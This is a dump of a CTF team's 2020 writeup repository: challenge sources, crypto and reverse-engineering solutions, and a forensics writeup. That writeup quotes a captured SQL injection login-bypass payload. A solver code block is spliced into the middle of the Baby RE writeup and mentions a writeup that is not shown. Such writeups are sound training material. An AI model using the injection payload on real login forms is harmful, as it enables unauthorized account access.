import random
from flag import flag

sv = bin(bytes_to_long(flag[5:-1]))[2:]
nbit = len(sv)
q = 39485091642302322462443783940079058526663151328744488399920207767

r = random.randint(2*nbit, 3*nbit)
enc = []
for _ in range(r):
    a = [random.randint(1, q-1) for _ in range(nbit)]
    a_s = 1
    for i in range(nbit):
        a_s = a_s * a[i] ** int(sv[i]) % q
    enc.append([a, a_s])

f = open('flag.enc', 'w')
f.write(str(q) + '\n' + str(enc))
f.close()

--------------------------------------------------------------------------------
/2020-07-03-ASIS-quals/kaffee/COB:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-07-03-ASIS-quals/kaffee/COB

--------------------------------------------------------------------------------
/2020-07-03-ASIS-quals/kaffee/flag.enc:
--------------------------------------------------------------------------------
46357996800001536651230000717718320000407743246400002905392055000026391663810000717718320000272601233700003287406603000023275690540000281474847300007177183200002997963156000039636528760000463579968000071771832000065957256300001443809702000095187343000001443809702000048832094400000144380970200002729084220000338787750000001289979018000032874066030000307126039000021869721330000138713624700003071260390000431145777900008053747180000388035637900003498480490000263916638100002186972133000044317610780000272908422000039636118700009090350020000218697213300001186356121000041933638650000338787750000002407469004000030712603900003880356379000034984804900007825296200005146902843

--------------------------------------------------------------------------------
/2020-07-03-ASIS-quals/latte/flag.latte:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-07-03-ASIS-quals/latte/flag.latte

--------------------------------------------------------------------------------
/2020-07-03-ASIS-quals/latte/latte:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-07-03-ASIS-quals/latte/latte

--------------------------------------------------------------------------------
/2020-07-03-ASIS-quals/mgr/flag.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-07-03-ASIS-quals/mgr/flag.enc

--------------------------------------------------------------------------------
/2020-07-03-ASIS-quals/mgr/mgr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-07-03-ASIS-quals/mgr/mgr

--------------------------------------------------------------------------------
/2020-07-03-ASIS-quals/tripolar/flag.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-07-03-ASIS-quals/tripolar/flag.enc

--------------------------------------------------------------------------------
/2020-07-03-ASIS-quals/tripolar/tripolar.py:
--------------------------------------------------------------------------------
#!/usr/bin/python

from Crypto.Util.number import *
from hashlib import sha1
from flag import flag

def crow(x, y, z):
    return (x**3 + 3*(x + 2)*y**2 + y**3 + 3*(x + y + 1)*z**2 + z**3 + 6*x**2 + (3*x**2 + 12*x + 5)*y + (3*x**2 + 6*(x + 1)*y + 3*y**2 + 6*x + 2)*z + 11*x) // 6

def keygen(nbit):
    p, q, r = [getPrime(nbit) for _ in range(3)]
    pk = crow(p, q, r)
    return (p, q, r, pk)

def encrypt(msg, key):
    p, q, r, pk = key
    _msg = bytes_to_long(msg)
    assert _msg < p * q * r
    _hash = bytes_to_long(sha1(msg).digest())
    _enc = pow(_msg, 31337, p * q * r)
    return crow(_enc * pk, pk * _hash, _hash * _enc)

key = keygen(256)
enc = encrypt(flag, key)
f = open('flag.enc', 'w')
f.write(long_to_bytes(enc))
f.close()

--------------------------------------------------------------------------------
/2020-07-25-CybricsCTF/README.md:
--------------------------------------------------------------------------------
# Cybrics CTF 2020

Team: XeR, BitK, shalom

### Table of contents

* [Baby RE (reverse)](baby_re)
* [Hellish reverse (misc)](hellish_re)
* [Hunt (web)](hunt)
* [XCorp (network)](xcorp)
* [Serial (misc)](serial)
* [Krevedka (forensics)](krevedka)
* [gif2png (web)](gif2png)
* [Broken Invitation (crypto)](invitation)
* [Google cloud (forensics)](gcloud)
* [Polyglot (re/misc)](polyglot)
* [Too secure (crypto)](too_secure)
* [Cat girl breach (re/misc)](catgirl)

--------------------------------------------------------------------------------
/2020-07-25-CybricsCTF/baby_re/README.md:
--------------------------------------------------------------------------------
# Baby RE (re, 50p, 314 solved)

In the task we get a [weird XML](babyrev.xml) which is some configuration for https://snap.berkeley.edu/snap/snap.html
We're too lazy to use such tools, and also the best RE tasks are just crypto blackboxes, so we scrolled through the XML and found:

```xml
66,88,67,83,72,66,82,90,86,18,77,16,98,17,76,18,126,97,79,69,126,102,17,17,69,126,77,116,66,74,0,92
```

It looked promising, so we checked what this would ASCII-decode into.
It was not a flag yet, but we figured that we know the flag format `cybrics{XXX}`, so we did some classic quick checks and:

```python
from crypto_commons.generic import xor_string

data = [66, 88, 67, 83, 72, 66, 82, 90, 86, 18, 77, 16, 98, 17, 76, 18, 126, 97, 79, 69, 126, 102, 17, 17, 69, 126, 77, 116, 66, 74, 0, 92]
string_data = "".join(map(chr, data))
# XOR the known flag prefix with the data to expose the key bytes
print(xor_string("cybrics", string_data).encode("hex"))
```

And we got a bunch of `0x21`, so it seems every character is XORed with the same byte.
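
The known-plaintext step used here and in the Plaint..image writeup, as a self-contained Python 3 example added for illustration (it is not the team's solver and does not use `crypto_commons`). The byte list, JPEG header and 40-byte sequence are the ones quoted in the writeups; the helper names and the 40-byte key and "image" built in `build_sample` are constructed, since the original `flag.jpg.enc` is not reproduced here.

```python
from itertools import cycle

# Values quoted in the two writeups.
BABY_RE = bytes([66, 88, 67, 83, 72, 66, 82, 90, 86, 18, 77, 16, 98, 17, 76, 18,
                 126, 97, 79, 69, 126, 102, 17, 17, 69, 126, 77, 116, 66, 74, 0, 92])
JPG_HEADER = bytes.fromhex("FFD8FFE000104A4649460001")
CRIB = b"()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxy"
KEY_LEN = 40


def xor_bytes(data, key):
    """XOR data with key, repeating the key as often as needed."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def keystream_prefix(ciphertext, known_plaintext):
    """Key bytes exposed by plaintext known to sit at offset 0."""
    return bytes(c ^ p for c, p in zip(ciphertext, known_plaintext))


def smallest_period(fragment):
    """Shortest key length that explains every recovered key byte."""
    for period in range(1, len(fragment) + 1):
        if all(b == fragment[i % period] for i, b in enumerate(fragment)):
            return period


def locate_crib(ciphertext, partial_key, key_len, crib):
    """Offsets where crib agrees with all bytes the partial key already decrypts."""
    hits = []
    for off in range(len(ciphertext) - len(crib) + 1):
        known = [i for i in range(len(crib))
                 if (off + i) % key_len < len(partial_key)]
        if known and all(
            ciphertext[off + i] ^ partial_key[(off + i) % key_len] == crib[i]
            for i in known
        ):
            hits.append(off)
    return hits


def key_from_crib(ciphertext, offset, crib, key_len):
    """Full key from a crib of at least key_len bytes located at offset."""
    key = bytearray(key_len)
    for i in range(key_len):
        key[(offset + i) % key_len] = ciphertext[offset + i] ^ crib[i]
    return bytes(key)


def solve_single_byte():
    """Baby RE: the known prefix 'cybrics' shows the key has period 1."""
    fragment = keystream_prefix(BABY_RE, b"cybrics")
    period = smallest_period(fragment)
    return period, xor_bytes(BABY_RE, fragment[:period]).decode()


def build_sample():
    """Constructed stand-in for flag.jpg.enc: header, filler, crib, filler."""
    key = bytes((i * 37 + 5) % 251 for i in range(KEY_LEN))    # constructed key
    filler = bytes((i * 73 + 11) % 256 for i in range(300))    # constructed data
    plain = JPG_HEADER + filler[:171] + CRIB + filler[171:]    # crib at offset 183
    return key, plain, xor_bytes(plain, key)


def solve_repeating_key():
    """Plaint..image: 12 header bytes locate the crib, the crib gives all 40."""
    key, plain, ct = build_sample()
    partial = keystream_prefix(ct, JPG_HEADER)
    hits = locate_crib(ct, partial, KEY_LEN, CRIB)
    recovered = key_from_crib(ct, hits[0], CRIB, KEY_LEN)
    return hits, recovered == key, xor_bytes(ct, recovered) == plain


if __name__ == "__main__":
    print(solve_single_byte())
    print(solve_repeating_key())
```

Unlike the manual step in the Plaint..image writeup, `locate_crib` does not need the known sequence to be aligned to a 40-byte chunk.
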
So we can do:

```python
print(xor_string(string_data, '\x21' * 100))
```

To get `cybrics{w3l1C0m3_@nd_G00d_lUck!}`

--------------------------------------------------------------------------------
/2020-07-25-CybricsCTF/catgirl/do_not_pet_me.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-07-25-CybricsCTF/catgirl/do_not_pet_me.exe

--------------------------------------------------------------------------------
/2020-07-25-CybricsCTF/catgirl/flag.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-07-25-CybricsCTF/catgirl/flag.enc

--------------------------------------------------------------------------------
/2020-07-25-CybricsCTF/gcloud/gcloud.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-07-25-CybricsCTF/gcloud/gcloud.pcap

--------------------------------------------------------------------------------
/2020-07-25-CybricsCTF/gcloud/result.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-07-25-CybricsCTF/gcloud/result.jpg

--------------------------------------------------------------------------------
/2020-07-25-CybricsCTF/hellish_re/README.md:
--------------------------------------------------------------------------------
# Hellish RE (re, 50p, 134 solved)

In the task we get an [archive](hellishreverse.tar.gz).
This is important here, because the python flag checker inside the archive is impossible to reverse.
The troll/trick here is that if we unpack this in two steps, first just gzip and then tar, we notice that the stored tar has a very interesting name: `vos_rebyc10_hellishreverse_verify_with_cybrics{ok_t4ht_wA5_qu1T3_4n_un3Xpec7eD_w4Y}.tar`

We submit `cybrics{ok_t4ht_wA5_qu1T3_4n_un3Xpec7eD_w4Y}` to get the points.

--------------------------------------------------------------------------------
/2020-07-25-CybricsCTF/hellish_re/hellishreverse.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-07-25-CybricsCTF/hellish_re/hellishreverse.tar.gz

--------------------------------------------------------------------------------
/2020-07-25-CybricsCTF/hunt/README.md:
--------------------------------------------------------------------------------
# Hunt (web, 50p, 577 solved)

In the task we get access to a simple webpage with 5 re-captcha boxes:

![](captcha.png)

The goal is to check all of them and submit the form to get the flag.
The issue is that those boxes are flying all over the screen...
The important bit of the page code is:

```js
function loop() {
    const height = window.innerHeight - captchaBox.offsetHeight;
    captchaBox.style.top = Math.sin(Date.now()/dividerA) * (height/2) + (height/2);

    const width = window.innerWidth - captchaBox.offsetWidth;
    captchaBox.style.left = Math.sin(Date.now()/dividerB) * (width/2) + (width/2);

    captchaBox.style.transform = `rotate(${Math.sin(Date.now()/dividerC) * 10}deg)`;

    setTimeout(loop, 1);
}
loop();
```

We can simply patch the `setTimeout` function from the browser console to stop the movement:

```js
setTimeout = function(){}
```

And we get: `cybrics{Th0se_c4p7ch4s_c4n_hunter2_my_hunter2ing_hunter2}`

--------------------------------------------------------------------------------
/2020-07-25-CybricsCTF/hunt/captcha.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-07-25-CybricsCTF/hunt/captcha.png

--------------------------------------------------------------------------------
/2020-07-25-CybricsCTF/invitation/broken_invitation.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-07-25-CybricsCTF/invitation/broken_invitation.pdf

--------------------------------------------------------------------------------
/2020-07-25-CybricsCTF/krevedka/README.md:
--------------------------------------------------------------------------------
# Krevedka (forensics, 50p, 164 solved)

In the task we get a 300MB pcap file to analyse (sorry, won't include it here).
We know that the user who got hacked had login `caleches` and we're supposed to find the attacker's login.

If we look for the victim's login we find:

```
POST /login HTTP/1.1
Host: kr3vedko.com
User-Agent: UCWEB/2.0 (Linux; U; Opera Mini/7.1.32052/30.3697; www1.smart.com.ph/; GT-S5360) U2/1.0.0 UCBrowser/9.8.0.534 Mobile
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: session=b75d53bb-1326-4d78-aedf-9bd92e237fbf
Content-Length: 39
Content-Type: application/x-www-form-urlencoded

login=caleches&password=%22+or+1%3D1+--
```

So a classic SQLi attack vector.

The idea to find the real attacker is pretty simple: notice that there was already a session cookie included in the request! Perhaps it was set during a previous attacker login?
Sadly, not the case.

On top of that, the attacker had a really interesting UA string, not a very common one.
If we look for the UA we can find:

```
POST /login HTTP/1.1
Host: kr3vedko.com
User-Agent: UCWEB/2.0 (Linux; U; Opera Mini/7.1.32052/30.3697; www1.smart.com.ph/; GT-S5360) U2/1.0.0 UCBrowser/9.8.0.534 Mobile
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: session=d4c78f87-b88c-4833-8851-ffd12856cf39
Content-Length: 35
Content-Type: application/x-www-form-urlencoded

login=micropetalous&password=1221nr
```

And this is our flag: `cybrics{micropetalous}`

--------------------------------------------------------------------------------
/2020-07-25-CybricsCTF/serial/1.js:
--------------------------------------------------------------------------------
var http = require('http');
var url = require('url');
var parse = require('querystring');
var fs = require('fs');
var index = fs.readFileSync('index.html');
var flag = fs.readFileSync('flag.html');
var err = fs.readFileSync('error.html');

http.createServer(function (req, res) {
    var q = url.parse(req.url, true)
    if (q.path == "/"){
        res.writeHead(200,{"Content-Type": "text/html"});
        res.write(index); //write a response to the client
        res.end(); //end the response
    }
    else if (q.path == "/enter"){
        if (req.method === 'POST') {
            var body = '';
            req.on('data', chunk=> {body += chunk.toString()});
            req.on('end', () => {
                body = parse.parse(body);
                var a=parseInt(body.serial1),b=parseInt(body.serial2),c=parseInt(body.serial3);
                console.log("Serial:",a,b,c)
                if ( (a>0 && a < 1000000) & (b>0 && b < 1000000) & (c>0 && c < 1000000) & a*a*a + b*b*b == c*c*c){
                    res.writeHead(200,{"Content-Type": "text/html"});
                    res.write(flag);
                    res.end();
                }
                else{
                    res.writeHead(200,{"Content-Type": "text/html"});
                    res.write(err);
                    res.end();
                }
            }
            )
        };
    }
    else{
        res.writeHead(404,{"Content-Type": "text/html"});
        res.write("404 Not found");
        res.end();
    }
}
).listen(8081);


--------------------------------------------------------------------------------
/2020-07-25-CybricsCTF/serial/README.md:
--------------------------------------------------------------------------------
# Serial (misc, 63p, 108 solved)

In the task we can access a web-based serial number checker.
We also have access to the [code](1.js).

It might seem trivial, because the code is just:

```js
if ( (a>0 && a < 1000000) & (b>0 && b < 1000000) & (c>0 && c < 1000000) & a*a*a + b*b*b == c*c*c){
    res.writeHead(200,{"Content-Type": "text/html"});
    res.write(flag);
    res.end();
}
```

So we just need to find 3 numbers which match the given condition.
Unfortunately, this is actually contradicting Fermat's Last Theorem https://en.wikipedia.org/wiki/Fermat%27s_Last_Theorem so there needs to be something fishy here.

We quickly stumble upon the `Number.MAX_SAFE_INTEGER` value in JS https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Number/MAX_SAFE_INTEGER

Apparently integers are internally stored as floats, and thus have a precision limit, and above this particular value a comparison might find two different numbers to be equal.

We now just need to compute the 3rd integer root of this value and set `a=c=iroot(Number.MAX_SAFE_INTEGER, 3)+1` and `b=1`.

This way `a**3` and `c**3` will be above `Number.MAX_SAFE_INTEGER` and if we just add `1` the comparison will still show as equal.
26 | 27 | We send `a=c=208064` and `b=1` and get `cybrics{CYB3R_M47H_15_57R4Ng3}` 28 | -------------------------------------------------------------------------------- /2020-07-25-CybricsCTF/too_secure/too_secure.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-07-25-CybricsCTF/too_secure/too_secure.pdf -------------------------------------------------------------------------------- /2020-07-25-CybricsCTF/xcorp/README.md: -------------------------------------------------------------------------------- 1 | # XCorp (network, 50p, 159 solved) 2 | 3 | In the task we get a [pcap](xcorp.pcap) to analyse. 4 | NetworkMiner recovers an [executable](net10.exe) included in the pcap for us. 5 | 6 | It's a simple .NET binary, with the most important part of the code being: 7 | 8 | ```csharp 9 | private void button1_Click(object sender, EventArgs e) 10 | { 11 | byte[] bytes = Encoding.ASCII.GetBytes(this.textBox1.Text); 12 | if (bytes.Length == 0) 13 | { 14 | MessageBox.Show("Please, enter username!"); 15 | return; 16 | } 17 | byte[] bytes2 = RC4.Encrypt(bytes, this.corp); 18 | if (Encoding.ASCII.GetString(bytes2) != "xcorporation") 19 | { 20 | MessageBox.Show("Incorrect!"); 21 | return; 22 | } 23 | byte[] bytes3 = RC4.Encrypt(bytes, this.flag); 24 | this.label2.Text = Encoding.ASCII.GetString(bytes3); 25 | } 26 | ``` 27 | 28 | The first static buffer is: 29 | ``` 30 | [218, 201, 193, 75, 114, 18, 81, 42, 33, 53, 127, 239] 31 | ``` 32 | 33 | And the second one: 34 | 35 | ``` 36 | [193, 211, 204, 75, 107, 30, 80, 48, 96, 111, 83, 244, 91, 214, 52, 0, 186, 157, 89, 127, 139, 164, 4, 105, 60, 22, 134, 43, 112, 69, 194] 37 | ``` 38 | 39 | RC4 is a stream cipher, so we could use the `xcorporation` plaintext and ciphertext to recover the keystream and decrypt a prefix of the flag, but this is not very useful. 40 | We actually need to find the valid username. 
41 | Grepping through the pcap we notice an interesting UTF string `u17ra_h4ck3r`, which turns out to be the valid RC4 passphrase: 42 | 43 | ```python 44 | xcorp_ct = "".join(map(chr, [218, 201, 193, 75, 114, 18, 81, 42, 33, 53, 127, 239])) 45 | flag_ct = "".join(map(chr, [193, 211, 204, 75, 107, 30, 80, 48, 96, 111, 83, 244, 91, 214, 52, 0, 186, 157, 89, 127, 139, 164, 4, 105, 60, 22, 134, 43, 112, 69, 194])) 46 | keystream = xor_string(xcorp_ct, 'xcorporation') 47 | print('flag prefix', xor_string(keystream, flag_ct)) 48 | rc4_key_bytes = rc4(map(ord, 'u17ra_h4ck3r'), 100) 49 | keystream = "".join(map(chr, rc4_key_bytes)) 50 | print('flag', xor_string(keystream, flag_ct)) 51 | ``` 52 | 53 | And we get: `cybrics{53CuR1tY_N07_0b5CuR17Y}` 54 | -------------------------------------------------------------------------------- /2020-07-25-CybricsCTF/xcorp/net10.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-07-25-CybricsCTF/xcorp/net10.exe -------------------------------------------------------------------------------- /2020-07-25-CybricsCTF/xcorp/xcorp.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-07-25-CybricsCTF/xcorp/xcorp.pcap -------------------------------------------------------------------------------- /2020-07-31-InCTF/README.md: -------------------------------------------------------------------------------- 1 | # InCTF 2020 2 | 3 | Team: XeR, SIben, Yumemi, shalom 4 | 5 | ### Table of contents 6 | 7 | * [Coins (misc/ppc)](coins) 8 | * [Invisible maze (misc/re)](maze) 9 | * [RE warmup (reverse)](re_warmup) 10 | * [ArchRide (reverse)](archride) 11 | * [Video bazar (web)](video) 12 | * [Poly RSA (crypto)](rsapoly) 13 | * [bakflip&sons (crypto)](backflip) 14 | * [DLPoly (crypto)](dlpoly) 15 | 
-------------------------------------------------------------------------------- /2020-07-31-InCTF/archride/surprise: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-07-31-InCTF/archride/surprise -------------------------------------------------------------------------------- /2020-07-31-InCTF/backflip/bakflips.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import random, sys 4 | from binascii import hexlify, unhexlify 5 | from ecdsa import SigningKey, NIST192p 6 | from flag import flag 7 | 8 | secret_multiplier = random.getrandbits(101) 9 | 10 | def menu(): 11 | menu = [exit, signMessage, verifyMessage, getFlag, sys.exit] 12 | 13 | print(""" 14 | bakflip&sons Signature Scheme 15 | 16 | 1) Sign Message 17 | 2) Verify Signature 18 | 3) Get Flag 19 | 4) Exit 20 | [ecdsa@cryptolab]# """, end = "") 21 | 22 | choice = int(input()) 23 | menu[choice]() 24 | 25 | def signMessage(): 26 | print(""" 27 | Sign Message Service - courtsy of bakflip&sons 28 | """) 29 | 30 | message = input("Enter a message to sign: ").encode() 31 | if message == b'please_give_me_the_flag': 32 | print("\n\t:Coughs: This ain't that easy as Verifier1") 33 | sys.exit() 34 | secret_mask = int(input("Now insert a really stupid value here: ")) 35 | 36 | secret = secret_multiplier ^ secret_mask 37 | 38 | signingKey = SigningKey.from_secret_exponent(secret) 39 | signature = signingKey.sign(message) 40 | print("Signature: ", hexlify(signature).decode()) 41 | 42 | 43 | def verifyMessage(): 44 | raise( 45 | NotImplementedError( 46 | "Geez! We are working round the clock to get this Beetle fixed." 47 | ) 48 | ) 49 | 50 | def getFlag(): 51 | print(""" 52 | BeetleBountyProgram - by bakflip&sons 53 | 54 | Wanted! 
Patched or Alive- $200,000 55 | Submit a valid signature for 'please_give_me_the_flag' and claim the flag 56 | """) 57 | signingKey = SigningKey.from_secret_exponent(secret_multiplier) 58 | verifyingKey = signingKey.verifying_key 59 | try: 60 | signature = unhexlify(input("Forged Signature: ")) 61 | if verifyingKey.verify(signature, b'please_give_me_the_flag'): 62 | print(flag) 63 | except: 64 | print("Phew! that was close") 65 | 66 | 67 | if __name__=="__main__": 68 | for i in range(73): menu() 69 | -------------------------------------------------------------------------------- /2020-07-31-InCTF/maze/output.gb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-07-31-InCTF/maze/output.gb -------------------------------------------------------------------------------- /2020-07-31-InCTF/re_warmup/warmup: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-07-31-InCTF/re_warmup/warmup -------------------------------------------------------------------------------- /2020-07-31-InCTF/video/out.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-07-31-InCTF/video/out.gif -------------------------------------------------------------------------------- /2020-08-24-GoogleCTF/README.md: -------------------------------------------------------------------------------- 1 | # GoogleCTF 2020 2 | 3 | Team: BitK, XeR, SakiiR, shalom 4 | 5 | ### Table of contents 6 | 7 | * [Beginner (re)](beginner) 8 | * [Android (re)](android) 9 | * [Basics (hardware)](basics) 10 | * [Chunk norris (crypto)](chunk) 11 | * [SHArky (crypto)](sharky) 12 | * [YAFM (crypto)](yafm) 13 | 
-------------------------------------------------------------------------------- /2020-08-24-GoogleCTF/android/reverse.apk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-08-24-GoogleCTF/android/reverse.apk -------------------------------------------------------------------------------- /2020-08-24-GoogleCTF/basics/check.sv: -------------------------------------------------------------------------------- 1 | module check( 2 | input clk, 3 | 4 | input [6:0] data, // 7 bit input 5 | output wire open_safe 6 | ); 7 | 8 | reg [6:0] memory [7:0]; // 8 element array of 7 bit registers 9 | reg [2:0] idx = 0; // 3 bit register, so counting mod 8 10 | 11 | wire [55:0] magic = { // 56 bit array, again MSB to LSB concat of bits 12 | {memory[0], memory[5]}, // msb to lsb concat, so memory[0][6],...,memory[0][0],memory[5][6],...,memory[5][0] 13 | {memory[6], memory[2]}, 14 | {memory[4], memory[3]}, 15 | {memory[7], memory[1]} 16 | }; 17 | 18 | wire [55:0] kittens = { magic[9:0], magic[41:22], magic[21:10], magic[55:42] }; 19 | assign open_safe = kittens == 56'd3008192072309708; // 56 bit decimal number 20 | 21 | always_ff @(posedge clk) begin 22 | memory[idx] <= data; 23 | idx <= idx + 5; // it's index % 8 so we're filling memory in order 0, 5, 2, 7, 4, 1, 6, 3 24 | end 25 | 26 | endmodule 27 | 28 | -------------------------------------------------------------------------------- /2020-08-24-GoogleCTF/basics/main.cpp: -------------------------------------------------------------------------------- 1 | #include "obj_dir/Vcheck.h" 2 | 3 | #include <iostream> 4 | #include <memory> 5 | 6 | int main(int argc, char *argv[]) { 7 | Verilated::commandArgs(argc, argv); 8 | std::cout << "Enter password:" << std::endl; 9 | auto check = std::make_unique<Vcheck>(); 10 | 11 | for (int i = 0; i < 100 && !check->open_safe; i++) { 12 | int c = fgetc(stdin); 13 | if (c == '\n' || c < 0) break; 14 | 
check->data = c & 0x7f; 15 | check->clk = false; 16 | check->eval(); 17 | check->clk = true; 18 | check->eval(); 19 | } 20 | if (check->open_safe) { 21 | std::cout << "CTF{real flag would be here}" << std::endl; 22 | } else { 23 | std::cout << "=(" << std::endl; 24 | } 25 | return 0; 26 | } 27 | 28 | -------------------------------------------------------------------------------- /2020-08-24-GoogleCTF/beginner/beginner: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-08-24-GoogleCTF/beginner/beginner -------------------------------------------------------------------------------- /2020-08-24-GoogleCTF/chunk/challenge.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 -u 2 | 3 | import random 4 | from Crypto.Util.number import * 5 | import gmpy2 6 | 7 | a = 0xe64a5f84e2762be5 8 | chunk_size = 64 9 | 10 | def gen_prime(bits): 11 | s = random.getrandbits(chunk_size) 12 | 13 | while True: 14 | s |= 0xc000000000000001 15 | p = 0 16 | for _ in range(bits // chunk_size): 17 | p = (p << chunk_size) + s 18 | s = a * s % 2**chunk_size 19 | if gmpy2.is_prime(p): 20 | return p 21 | 22 | n = gen_prime(1024) * gen_prime(1024) 23 | e = 65537 24 | flag = open("flag.txt", "rb").read() 25 | print('n =', hex(n)) 26 | print('e =', hex(e)) 27 | print('c =', hex(pow(bytes_to_long(flag), e, n))) 28 | -------------------------------------------------------------------------------- /2020-08-24-GoogleCTF/chunk/output.txt: -------------------------------------------------------------------------------- 1 | n = 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 2 | e = 0x10001 3 | c = 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 4 | -------------------------------------------------------------------------------- /2020-08-24-GoogleCTF/sharky/challenge.py: 
-------------------------------------------------------------------------------- 1 | #! /usr/bin/python3 2 | import binascii 3 | import os 4 | import sha256 5 | 6 | # Setup msg_secret and flag 7 | FLAG_PATH = 'data/flag.txt' 8 | NUM_KEYS = 8 9 | MSG = b'Encoded with random keys' 10 | 11 | with open(FLAG_PATH, 'rb') as f: 12 | FLAG = f.read().strip().decode('utf-8') 13 | 14 | 15 | def sha256_with_secret_round_keys(m: bytes, secret_round_keys: dict) -> bytes: 16 | """Computes SHA256 with some secret round keys. 17 | 18 | Args: 19 | m: the message to hash 20 | secret_round_keys: a dictionary where secret_round_keys[i] is the value of 21 | the round key k[i] used in SHA-256 22 | 23 | Returns: 24 | the digest 25 | """ 26 | sha = sha256.SHA256() 27 | round_keys = sha.k[:] 28 | for i, v in secret_round_keys.items(): 29 | round_keys[i] = v 30 | return sha.sha256(m, round_keys) 31 | 32 | 33 | def generate_random_round_keys(cnt: int): 34 | res = {} 35 | for i in range(cnt): 36 | rk = 0 37 | for b in os.urandom(4): 38 | rk = rk * 256 + b 39 | res[i] = rk 40 | return res 41 | 42 | if __name__ == '__main__': 43 | secret_round_keys = generate_random_round_keys(NUM_KEYS) 44 | digest = sha256_with_secret_round_keys(MSG, secret_round_keys) 45 | print('MSG Digest: {}'.format(binascii.hexlify(digest).decode())) 46 | GIVEN_KEYS = list(map(lambda s: int(s, 16), input('Enter keys: ').split(','))) 47 | assert len(GIVEN_KEYS) == NUM_KEYS, 'Wrong number of keys provided.' 
48 | 49 | if all([GIVEN_KEYS[i] == secret_round_keys[i] for i in range(NUM_KEYS)]): 50 | print('\nGood job, here\'s a flag: {0}'.format(FLAG)) 51 | else: 52 | print('\nSorry, that\'s not right.') 53 | -------------------------------------------------------------------------------- /2020-08-24-GoogleCTF/yafm/server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 -u 2 | 3 | import random 4 | from Crypto.Util.number import * 5 | from Crypto.Cipher import PKCS1_OAEP 6 | from Crypto.PublicKey import RSA 7 | import binascii 8 | 9 | def generate_prime(prime_len): 10 | bits_len = 180 11 | while True: 12 | bits = random.getrandbits(bits_len) 13 | idxs = random.sample(list(range(1, prime_len-2)), bits_len) 14 | p = 1 | 2**(prime_len - 1) | 2**(prime_len - 2) 15 | for i in range(bits_len): 16 | p += (bits >> i & 1)*2**idxs[i] 17 | if isPrime(p): 18 | return p 19 | 20 | key = None 21 | flag = open("flag.txt", "rb").read() 22 | 23 | print("Welcome to my Prime Obsession. 
